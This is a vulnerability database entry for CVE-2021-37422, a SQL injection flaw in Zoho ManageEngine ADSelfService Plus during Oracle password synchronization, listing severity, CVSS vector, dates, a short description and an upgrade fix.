vulnerability
Zoho ManageEngine ADSelfService Plus: CVE-2021-37422: SQL Injection while linking the databases.
| Severity | CVSS | Published | Added | Modified |
|---|---|---|---|---|
| 7 | (AV:N/AC:L/Au:N/C:P/I:P/A:P) | Aug 26, 2021 | Dec 18, 2024 | Jul 2, 2025 |
Severity
7
CVSS
(AV:N/AC:L/Au:N/C:P/I:P/A:P)
Published
Aug 26, 2021
Added
Dec 18, 2024
Modified
Jul 2, 2025
Description
A SQL injection vulnerability was discovered in ADSelfService Plus when password synchronization was enabled for Oracle Database. This issue has now been fixed.During account linking between Active Directory and Oracle Database for password synchronization, the usernames provided were added into SQL queries without sanitization. These were then sent to the linked Oracle Database, making the application vulnerable to Boolean-based SQL injection attacks. If the injection attacks become successful, there is a risk of data from ADSelfService Plus being exposed.
Solution
zoho-manageengine-adselfservice-plus-upgrade-latest
NEW
Explore Exposure Command
Confidently identify and prioritize exposures from endpoint to cloud with full attack surface visibility and threat-aware risk context.